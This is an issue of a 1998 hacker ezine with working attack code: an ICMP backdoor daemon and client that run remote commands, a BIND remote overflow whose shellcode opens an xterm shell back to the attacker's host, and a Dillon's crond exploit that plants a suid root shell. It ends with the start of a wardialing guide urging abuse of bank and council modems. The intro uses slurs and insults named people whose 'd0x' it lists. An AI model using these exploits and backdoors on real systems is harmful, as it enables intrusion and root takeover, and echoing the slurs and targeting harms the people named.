-------------------------------------------------------------------------------
                 . [cZo] . Team CodeZero Presents . [cZo] .
-------------------------------------------------------------------------------

           [ASCII-art "Confidence Remains High" logo by mydknight]

-------------------------------------------------------------------------------
                         Issue 9          11th May 1998
-------------------------------------------------------------------------------

Man with the plan : so1o
The usual         : om3n, zer0x, xFli, electro, spheroid, el8, ultima, chameleon.
Not forgotten     : loss, organik, peenut, pzn, suid helix, deprave, manly, Shok.
Others            : paladine, Sciri, fiji, ch-E-ztic, vacuum, humble.
Cheers            : Darkcyde, Jf.
Russians          : lirik, DemiGod, stranger, ps.
Rhino9            : www.rhino9.org

            .-----------[ An Official ]-----------.
            :  C  R  H  -  Confidence Remains High  :
            `-----------[ Production ]------------'

-------------------------------------------------------------------------------
In This (compact) Installment of Confidence Remains High :
-------------------------------------------------------------------------------

------=> Section A : Introduction And Cover Story.

 1. Confidence Remains High issue 9....................: Tetsu Khan

------=> Section B : Exploits And Code.

 1. ICMP backdoor client and server....................: BiT
 2. BIND 4.9.5 remote..................................: prym
 3. flea.c.............................................: SrfRoG
 4. Dillons Linux crond exploit........................: BM V
 5. KDE klock local exploit............................: someone on bugtraq

------=> Section C : Phones / Scanning / Radio.

 1. Wardialing in the UK...............................: Jf

------=> Section D : Miscellaneous (aka. d0x)

 1. p0sse.rolodex (mad outdated anyway)................: juurigaveitout
 2. RLoxley, first class fuckwit (and fatboy)..........: WH0 GN0Z?
 3. Carolyn Meinel d0x.................................: savec0re

------=> Section E : World News.

 1. MOD break DISN.....................................: JP

------=> Section G : FIN.

-------------------------------------------------------------------------------

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

-------------------------------------------------------------------------------
1. Confidence Remains High issue 9 : Tetsu Khan
-------------------------------------------------------------------------------

Blah blah blah, welcome to CRH009. You will find el8 0-day exploits and code,
as well as some semi-interesting texts on a fag called RLoxley, a cl00le$
fuckwit called Carolyn Meinel, and some info on the MOD.. phear

The Distro List :
=================

152.7.11.38            /pub/personal/tattooman/confidence_remains_high/
ftp.sekurity.org       /users/so1o/
ftp.technotronic.com   /ezines/crh/
cybrids.simplenet.com  /Toast/files/CRH/
ftp.linuxwarez.com     /pub/crh/

-------------------------------------------------------------------------------

===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================

-------------------------------------------------------------------------------
1. ICMP backdoor client and server : BiT
-------------------------------------------------------------------------------

icmpd.c == server daemon
icmpc.c == client

<--icmpd.c-------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <string.h>        /* memcpy, strcpy, strcasecmp, strlen */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <unistd.h>

#define RID 31337          /* echo id the daemon listens for */
#define LID 12345          /* echo id the daemon answers with */
#define VER "0.3"

void start_pipe(char *buf,int len);
void send_connect(unsigned long to, unsigned int id,char *data);
u_short cksum(u_short *buf, int nwords);

void main()
{
  char buf[512];
  struct iphdr *ip=(struct iphdr *)buf;
  struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
  int lsock,i;

  printf("ICMP PIPE %s - DAEMON PART - BiT'97\n",VER);
  if(geteuid()) printf("User luser detected\n"),exit(-1);
  lsock=socket(AF_INET,SOCK_RAW,1);
  close(0);close(1);close(2);
  if(fork()) exit(0);
  while(1)
  {
    /* wait for an ICMP echo reply (type 0) whose id matches RID */
    i=read(lsock,buf,512);
    if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID)
      start_pipe(buf,i);
  }
}

void start_pipe(char *buf,int len)
{
  char databuf[512];
  FILE *haha;
  struct iphdr *ip=(struct iphdr *)buf;
  struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
  int lsock,i;
  char *p;
  unsigned long int tmp;
  struct sockaddr_in sa;

  lsock=socket(AF_INET,SOCK_RAW,1);
  icmp->un.echo.id=ntohs(LID);
  sa.sin_family=AF_INET;
  sa.sin_addr.s_addr=ip->saddr;
  sendto(lsock,icmp,len-sizeof(struct iphdr),0,(struct sockaddr *)&sa,sizeof(sa));
  /* connected */
  while(1)
  {
    i=recv(lsock,buf,512,0);
    if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID)
    {
      /* command text follows the IP and ICMP headers */
      p=(buf+sizeof(struct iphdr)+sizeof(struct icmphdr));
      memcpy(databuf,p,i-(sizeof(struct iphdr)+sizeof(struct icmphdr))+1);
      if(strcasecmp(databuf,"exit") == 0) return;
      if((haha=popen(databuf,"r")) == NULL)
        send_connect(ip->saddr,LID,"Unknown command.\n");
      else
      {
        i=0;
        while(fgets(databuf,512,haha) != NULL)
        {
          i++;
          send_connect(ip->saddr,LID,databuf);
        }
        if(!i) send_connect(ip->saddr,LID,"Unknown command.\n");
        pclose(haha);
      }
    }
    fflush(stdout);fflush(stdin);
  }
}

void send_connect(unsigned long to, unsigned int id,char *data)
{
  char buf[512];
  struct icmphdr *icmp = (struct icmphdr *)buf;
  char *bla=(buf+sizeof(struct icmphdr));
  struct sockaddr_in sa;
  int i,sock;

  sock=socket(AF_INET,SOCK_RAW,1);
  bzero(buf,512);
  icmp->type=0;
  icmp->un.echo.id=htons(id);
  strcpy(bla,data);
  icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
  sa.sin_family=AF_INET;
  sa.sin_addr.s_addr=to;
  i=sendto(sock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
  close(sock);
}

u_short cksum(u_short *buf, int nwords)
{
  unsigned long sum;

  for ( sum = 0; nwords > 0; nwords -- )
    sum += *buf++;
  sum = ( sum >> 16) + ( sum & 0xffff );
  sum += ( sum >> 16 );
  return ~sum ;
}
<--end of icmpd.c------------------------------------------------------------->

<--icmpc.c-------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <string.h>        /* memcpy, strcpy, strcasecmp, strlen */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <arpa/inet.h>     /* inet_addr */
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <netdb.h>

#define LID 12345
#define VER "0.3"

unsigned int RID;
unsigned long host,myip;
int state=0;

unsigned long int res(char *p);
void send_connect(unsigned long to, unsigned int id,char *data);
void get_string_and_send(void);
void show_shit(char *buf);
u_short cksum(u_short *buf, int nwords);

void main(int argc, char **argv)
{
  char buf[512];
  struct iphdr *ip = (struct iphdr *)buf;
  struct icmphdr *icmp = (struct icmphdr *)(buf+sizeof(struct iphdr));
  int i,lsock;
  fd_set f;

  printf("ICMP PIPE %s - CLIENT PART - BiT'97\n",VER);
  if(argc<3) printf("%s <host> <rid>\n",*argv),exit(-1);
  if(geteuid()) printf("User luser detected\n"),exit(-1);
  host=res(argv[1]);
  RID=atoi(argv[2]);
  lsock=socket(AF_INET,SOCK_RAW,1);
  send_connect(host,RID,"a");
  state=1;
  fcntl(lsock,F_SETFL,O_NONBLOCK);
  fcntl(fileno(stdin),F_SETFL,O_NONBLOCK);
  while(1)
  {
    fflush(stdout);
    fflush(stdin);
    FD_ZERO(&f);
    FD_SET(fileno(stdin),&f);
    FD_SET(lsock,&f);
    if(select(FD_SETSIZE,&f,NULL,NULL,NULL))
    {
      if(FD_ISSET(fileno(stdin),&f)) get_string_and_send();
      if(FD_ISSET(lsock,&f))
      {
        i=read(lsock,buf,512);
        if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == LID)
        {
          if(state==2) show_shit(buf);
          if(state==1)
          {
            state++;
            printf("Connected.\n");
          }
          myip=ip->daddr;
        }
      }
    }
  }
}

unsigned long int res(char *p)
{
  struct hostent *h;
  unsigned long int rv;

  h=gethostbyname(p);
  if(h!=NULL) memcpy(&rv,h->h_addr,h->h_length);
  else rv=inet_addr(p);
  return rv;
}

void send_connect(unsigned long to, unsigned int id,char *data)
{
  char buf[512];
  struct icmphdr *icmp = (struct icmphdr *)buf;
  char *bla=(buf+sizeof(struct icmphdr));
  struct sockaddr_in sa;
  int i,ssock;

  ssock=socket(AF_INET,SOCK_RAW,1);
  bzero(buf,512);
  icmp->type=0;
  icmp->un.echo.id=htons(id);
  strcpy(bla,data);
  icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
  sa.sin_family=AF_INET;
  sa.sin_addr.s_addr=to;
  i=sendto(ssock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
  close(ssock);
}

void get_string_and_send(void)
{
  char buf[512];

  bzero(buf,512);
  read(0,buf,512);
  buf[strlen(buf)-1]=0;
  send_connect(host,RID,buf);
  if(strcasecmp(buf,"exit") == 0) exit(1);
}

void show_shit(char *buf)
{
  printf((buf+sizeof(struct iphdr)+sizeof(struct icmphdr)));
}

u_short cksum(u_short *buf, int nwords)
{
  unsigned long sum;

  for ( sum = 0; nwords > 0; nwords -- )
    sum += *buf++;
  sum = ( sum >> 16) + ( sum & 0xffff );
  sum += ( sum >> 16 );
  return ~sum ;
}
<--end of icmpc.c------------------------------------------------------------->

-------------------------------------------------------------------------------
2. BIND 4.9.5 remote exploit : prym
-------------------------------------------------------------------------------

/*
 * z, thnx.
 * ganked the xterm exec from adm, thnx.
 * have fun.
 * -prym
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define REMOTE

#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0

#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)

struct target_type
{
  char desc[40];
  int systype;
  unsigned long addr;
  unsigned long opt_addr;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
  {{0},0,0,0}
};

unsigned long resolve(char *host)
{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))<0)
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);
  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);
  if(write(fd,tmp,2)!=2) return(-1);
  if(write(fd,buff,len)!=len) return(-1);
  return(1);
}

int attack(int fd, struct in_addr us, struct target_type t, unsigned long offset,
           int optimized)
{
  char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;

  memset(dnsh,0,sizeof(HEADER));
  dnsh->id = htons(31337);
  dnsh->opcode = IQUERY;
  dnsh->rd = 1;
  dnsh->ra = 1;
  dnsh->ancount = htons(1);
  ptr += sizeof(HEADER);
  len += sizeof(HEADER);
  *ptr = '\0';
  ptr++;
  PUTSHORT(T_A,ptr);
  PUTSHORT(C_IN,ptr);
  PUTLONG(31337,ptr);
  dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  PUTSHORT(dlen,ptr);
  len += PRE_OF_DATALEN;
  memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
  if(t.systype==0)
  {
#ifdef REMOTE
    char c1[] =
      "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
      "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
      "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
      "\x80\xe8\xcc\xff\xff\xff";
    char c2[] = "/usr/bin/X11/xterm\xff-display\xff";
    char c3[32];
    char c4[] = "\xfe\xe8\xb1\xff\xff\xff";

    snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
    c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
    c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
    i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
    memset(ptr,0x90,i);
    memcpy((ptr+i),c1,strlen(c1));
    memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
    memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
    memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
    char c0de[] =
      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
      "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
      "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
    int i = EVILSPACE-strlen(c0de);

    memset(ptr,0x90,i);
    memcpy((ptr+i),c0de,strlen(c0de));
#endif
  }
  else
    return(0);
  if(!optimized)
  {
    memcpy((ptr+(dlen-16)),&al,sizeof(al));
    memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
  }
  i = (optimized?t.opt_addr:t.addr)+offset;
  memcpy((ptr+(dlen-4)),&i,sizeof(i));
  len += dlen;
  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;
  struct in_addr xs;

  for(i=0;target[i].desc[0];i++);
  if(argc<3)
  {
    fprintf(stderr,"\ntarget types:\n");
    fprintf(stderr,"  %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
            "description");
    for(target_index=0;target_index<i;target_index++)
      fprintf(stderr,"  %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
              (unsigned int)target[target_index].addr,
              (unsigned int)target[target_index].opt_addr,
              target[target_index].desc);
    fprintf(stderr,
            "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
            argv[0]);
    exit(-1);
  }
  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
  {
    fprintf(stderr,"error: invalid target type %d\n",target_index);
    exit(-1);
  }
  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
  {
    fprintf(stderr,"error: internal error\n");
    exit(-1);
  }
  if(argc>4)
  {
    optimized = atoi(argv[4]);
    if((optimized!=0)&&(optimized!=1))
    {
      fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
      exit(-1);
    }
  }
  if((optimized==0)&&(target[target_index].addr==0)) optimized = 1;
  if((optimized==1)&&(target[target_index].opt_addr==0)) optimized = 0;
  if(argc>5) offset = atoi(argv[5]);
  if(!(xs.s_addr=resolve(argv[2])))
  {
    fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
    exit(-1);
  }
  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
  {
    fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
    exit(-1);
  }
  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);
  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
  {
    perror("error: socket");
    exit(-1);
  }
  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
  {
    perror("error: connect");
    exit(-1);
  }
  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
         (optimized?target[target_index].opt_addr:target[target_index].addr));
  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");
  switch(attack(sock,xs,target[target_index],offset,optimized))
  {
    case -1:
      perror("error: attack");
      return(-1);
      break;
    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
  }
  if(close(sock)!=0)
  {
    perror("error: close");
    return(-1);
  }
  exit(0);
}

-------------------------------------------------------------------------------
3. flea.c : SrfRoG
-------------------------------------------------------------------------------

/*
 * flea.c : fetch stuff from the Web without launching a browser.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
 */

/*
 * TODO:
 *
 * 1) Use threads for multiple gets.
 * 2) More file options.
 * 3) Better output display.
 * 4) Configuration file.
 * 5) Host cache'ing.
 * 6) HTTP/1.1 Message parsing / compliance.
 * 7) MIME types handling.
 *
 * Email comments / suggestions to srfrog@nema.com
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>   /* needed for socket(), connect() and send() */

#ifndef TRUE
#define TRUE 1
#define FALSE 0
#endif

#define m_isalpha(x) (((x) >= 'a' && (x) <= 'z') || ((x) >= 'A' && (x) <= 'Z'))
#define m_isdigit(x) ((x) >= '0' && (x) <= '9')
#define m_isspace(x) ((x) == ' ' || (x) == '\f' || (x) == '\n' || (x) == '\r' || (x) == '\t' || (x) == '\v')

#define MAXLEN 512
#define WIDTH 79
#define VERSION "0.9"

unsigned int serv_port(char);

/* Some variables used */
static int nofetchfile = FALSE;
static char *pn = (char *)0;

typedef struct url_entry {
    char *hostname;
    unsigned int port;
    char *path;
    char *file;
} URL;

/* print a status line, padding over whatever the previous one left behind */
static void status(char *fmt, ...)
{
    va_list msg;
    char buf[MAXLEN], *p = buf, c;
    int len;
    static int old_len = 0;

    va_start(msg, fmt);
    /* bounded write into buf; the original used vsprintf() here */
    vsnprintf(buf, sizeof(buf), fmt, msg);
    va_end(msg);
    len = strlen(buf) - 1;
    c = buf[len];
    write(1, p, len);
    if (old_len > len) {
        int i, j;
        char k = ' ';
        for (i=0, j=(old_len - len); j > i; ++i)
            write(1, &k, 1);
        write(1, &c, 1);
        return;
    }
    old_len = len;
    write(1, &c, 1);
}

/* count occurrences of c in s */
static int strcount(s, c)
char *s, c;
{
    int index=0, count=0;

    while (s[index] != '\0') {
        if (s[index] == c)
            count++;
        index++;
    }
    return(count);
}

/* split "http://host[:port][/path/][file]" into its URL fields */
static URL strip_url(url)
char *url;
{
    int i, idx=0, skip=0;
    char tmp[MAXLEN*2], *p = tmp;
    URL u;

    /* the caller tests u.hostname, so never hand back an uninitialised struct */
    memset(&u, 0, sizeof(u));
    if (0 == strncmp(url,"http://",7))
        idx = 7;
    for (i=0; (url[idx]!=':' && url[idx]!='/' && url[idx]!='\0'); i++,idx++)
        tmp[i] = url[idx];
    if (i == 0)
        return (u);
    tmp[i] = 0;
    u.hostname = strdup(p);
    if (url[idx] == ':') {
        ++idx;
        for (i=0; m_isdigit(url[idx]); i++,idx++)
            tmp[i] = url[idx];
        tmp[i] = 0;
        u.port = (unsigned int) atoi(p);
    } else
        u.port = 80;
    skip = strcount(&url[idx], '/');
    for (i=0; skip > 0; i++,idx++) {
        tmp[i] = url[idx];
        if (url[idx]=='/')
            skip--;
    }
    tmp[i] = 0;
    u.path = strdup(p);
    for (i=0; url[idx]!='\0'; i++,idx++)
        tmp[i] = url[idx];
    tmp[i]=0;
    u.file = strdup(p);
    if (i == 0) {
        nofetchfile = TRUE;
        strcpy(p,"flea.dump");
        u.file = strdup(p);
    }
    return (u);
}

/* open a TCP connection to u.hostname:u.port, return the socket or <0 */
static int connect_url(u)
URL u;
{
    struct hostent *host;
    struct sockaddr_in sin;
    int s = -1;

    if ((host = gethostbyname(u.hostname)) == NULL) {
        perror(pn);
        return(-1);
    }
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror(pn);
        return(-2);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(u.port);
    bcopy(host->h_addr, &sin.sin_addr, host->h_length);
    printf("Connecting to remote host %s:%u\n", u.hostname, u.port);
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror(pn);
        close(s);
        return(-3);
    }
    return (s);
}

/* copy the response body from fdr to fdw, reporting progress and throughput */
static void process_file(fdw, fdr, u)
int fdw, fdr;
URL *u;
{
    time_t start = 0L, end = 0L;
    int n, m, bytes=0;
    float x=0.0;
    char buffer[MAXLEN+1], *p = buffer;

    time(&start);
    while (1) {
        n = read(fdr, p, MAXLEN);
        switch (n) {
        case -1:
            status("%s: Read error: %s\n", u->file, strerror(errno));
            break;
        case 0:
            time(&end);
            n = (int)(end - start) + 1;
            x = (float)bytes / (float)n;
            x /= 1024.0;
            status("%s: Received %d bytes in %d sec%s (%.3f kb/s)\n",
                   u->file, bytes, n, (n == 1) ? "" : "s", x);
            break;
        default:
            m = write(fdw, p, n);
            if (m > 0) {
                bytes += m;
                status("%s: Writing: %d bytes\r", u->file, bytes);
                continue;
            }
            status("%s: Write error: %s\n", u->file, strerror(errno));
            break;
        }
        break;
    }
    close(fdw);
    close(fdr);
}

static void launch_fetcher(url)
char *url;
{
    int sock = -1, i, j, outfd = -1;
    URL u;
    char tmp[MAXLEN*2];

    /* sanity */
    if (!url)
        return;
    u = strip_url(url);
    if (!u.hostname) {
        perror(pn);
        return;
    }
    if ((sock = connect_url(u)) < 0)
        return;
    if ((outfd = open(u.file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) {
        perror(pn);
        close(sock);
        return;
    }
#if defined(__linux__)
    i = sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n", u.path,
                (nofetchfile == FALSE)?u.file:"/");
#else
    sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n", u.path,
            (nofetchfile == FALSE)?u.file:"/");
    i = strlen(tmp);
#endif
    if (send(sock, tmp, i, 0) < 0) {
        perror(pn);
        close(sock);
        close(outfd);
        return;
    }
    /* remove httpd header: echo each header line, stop at the blank line */
    {
        char c;
        j=0;
        while (read(sock, &c, 1)) {
            tmp[j++] = c;
            if (c != '\n')
                continue;
            if (j > 2) {
                tmp[j]=0;
                j=0;
                printf("%s: %s",u.file,tmp);
                fflush(stdout);
                continue;
            }
            break;
        }
    }
    status("%s: Waiting for data connection...\r", u.file);
    process_file(outfd, sock, &u);
}

int main(argc, argv)
int argc;
char **argv;
{
    if (argc < 2) {
        printf("\nflea Web fetcher v%s by SrfRoG (srfrog@nema.com)\n\n", VERSION);
        puts("\
 Usage: flea [http://host[:port][/][filename]]\n\n\
 If no file is given, the index file or file listing\n\
 is dumped to 'flea.dump'.\n\n\
 Examples:\n\
 \tflea http://www.cgifx.com/img/cgifx.gif\n\
 \tflea http://www.cgifx.com/img/\n\
 \tflea http://www.cgifx.com");
        fflush(stdout);
        return 1;
    }
    pn = argv[0];
    launch_fetcher(argv[1]);
    return 0;
}

-------------------------------------------------------------------------------
4. Dillons Linux crond exploit : BM V
-------------------------------------------------------------------------------

/* Dillon's Crond v2.2 exploit          */
/*                                      */
/* There exists a buffer overflow       */
/* in Slackware's /usr/sbin/crond       */
/* in the fdprintf() function from      */
/* subs.c [specifically vsprintf()]     */
/* Also take note that the overflow     */
/* was discovered by the KSRT team.     */
/*                                      */
/* Simply compile and run this.         */
/* and look for a suid root shell       */
/* in /tmp (/tmp/XxX) in about one      */
/* minute. Also please use this in      */
/* a responsible manner.                */
/*                                      */
/* also try crondsploit 1000            */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen, memset */
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>

#define DEFAULT_OFFSET 560
#define DEFAULT_BUFFER_SIZE 980
#define TOTAL_BUFFER 4096

char shellcode[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/tmp/xo";

long get_esp(void)
{
  __asm__("movl %esp,%eax");
}

void calc_bs(int *bs_ptr)
{
  int len=0;
  struct passwd *p_name;

  /* dependent on length of username */
  p_name=getpwuid(getuid());
  len=strlen(p_name->pw_name);
  *bs_ptr = 986 - len;
  return;
}

int main(int argc, char **argv)
{
  char *buff = NULL;
  unsigned long *addr_ptr = NULL;
  char *ptr = NULL;
  int i, ofs=DEFAULT_OFFSET;
  int bs=DEFAULT_BUFFER_SIZE;
  FILE *fp=NULL;

  /* probably will not need to give argument */
  if (argc==2) ofs=atoi(argv[1]);

  calc_bs(&bs);

  buff=malloc(TOTAL_BUFFER);
  if(!buff) {
    perror("malloc");
    exit(EXIT_FAILURE);
  }

  ptr=buff;
  memset(ptr,0x90, bs-strlen(shellcode));
  ptr += bs-strlen(shellcode);
  for (i=0; i<strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
  addr_ptr = (long *)ptr;
  for (i=0; i<2; i++)
    *(addr_ptr++)=get_esp()-ofs;
  ptr=(char *)addr_ptr;
  *ptr=0;

  /* create binary in /tmp to make suid shell */
  fp=fopen("/tmp/xo.c","w+");
  if (!fp) {
    fprintf(stderr,"Can't open /tmp/xo.c for writing!");
    exit(EXIT_FAILURE);
  }
  fprintf(fp,"#include <stdio.h>\n");
  fprintf(fp,"#include <stdlib.h>\n");
  fprintf(fp,"main() {\n");
  fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
  fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
  fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
  fprintf(fp,"}\n");
  fclose(fp);

  /* compile our program to create suid shell */
  system("cc -o /tmp/xo /tmp/xo.c");
  unlink("/tmp/xo.c");

  /* now use crontab to plant overflow for crond */
  fp=fopen("r00t","w+");
  if (!fp) {
    perror("fopen");
    exit(EXIT_FAILURE);
  }
  fprintf(fp,"%s\n",buff);
  fclose(fp);

  /* put our r00t crontab in crontabs directory */
  system("/usr/bin/crontab r00t");
  unlink("r00t");

  /* helpful reminder */
  printf("Now wait about 1 minute and look\n");
  printf("for the suid shell -> /tmp/XxX\n");
  exit(0);
}

-------------------------------------------------------------------------------
5. KDE klock local exploit : someone on bugtraq
-------------------------------------------------------------------------------

..included in kde.gz with this crh009.zip

-------------------------------------------------------------------------------

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================

-------------------------------------------------------------------------------
1. Wardialing in the UK : Jf
-------------------------------------------------------------------------------

Wardialing in the UK, for me, is a very interesting subject. Although a lot of
the modern c0de kiddies consider it "old-sk00l" and see it as no use today,
Wardialing is actually, in my opinion, one of the greatest Hacking related
things to do. Hacking a Webpage is fun, yes, but an isolated carrier provides
much more entertainment and excitement, and via wardialing we aim to find
these carriers along with lots of other cool things which will provide the
phun.
All the time, I am approached and people ask me HOW TO wardial in the UK. I
always tell people it's the same as in the UK, but people act so confused
about the whole idea of UK Wardialing. Basically the little Windoze kiddies
see some old wardialer, try it out and find that the area code to enter is
only allowed to be up to 3 numbers long, therefore a US area code; with this
they panic and cry out for help. Or they download a version of ToneLoc and
PANIC because they do not understand the program, which CAN be used for UK
wardialing and is the one I always use.

This is where this help file is intended to come in useful. It will guide you
through the basics of wardialing in the UK and what you will find on your
journey, and it will also guide you in using ToneLoc successfully to scan
loads of numbers and gain interesting results in finding carriers, VMBs, PBXs
and numerous other interesting things.

##############
Where to start
##############

Wardialing is the process of scanning a large range of numbers and finding
interesting things, as I have already stated. There are literally thousands
of Carrier Tones in England which all perform different tasks and are owned
by different companies. For example - Banks (yes BANKS, hehe), Libraries
(delete those excess fines), Local Government (piss off your council) ..and
loads more big companies and organisations. It may sound like a little
movie-style picture of hacking (WARGAMES comes to mind) but it's REAL, it
does exist and people do mess with this sort of thing, hehe.

Certain Carrier tones can also be abused and be set up so that you can
connect perfectly to the Internet, which will result, if the carrier is
located within a FREE CALL netw0rk, in an 0800 dialup.

People tend to mainly wardial for carrier tones but VMBs and PBXs can be
found by Wardialing as well, so wardialing provides a great use for Phreaks
who are interested in these things.

Although I personally haven't found a PBX while wardialing for about 6 months,
someone, somewhere will no doubt be finding one and abusing one as I type.
VMBs are common findings while wardialing, especially on FREE CALL netw0rks,
and I have great phun with these.

The 0800/0500 Service Network numbers, which are of course FREE, are the best
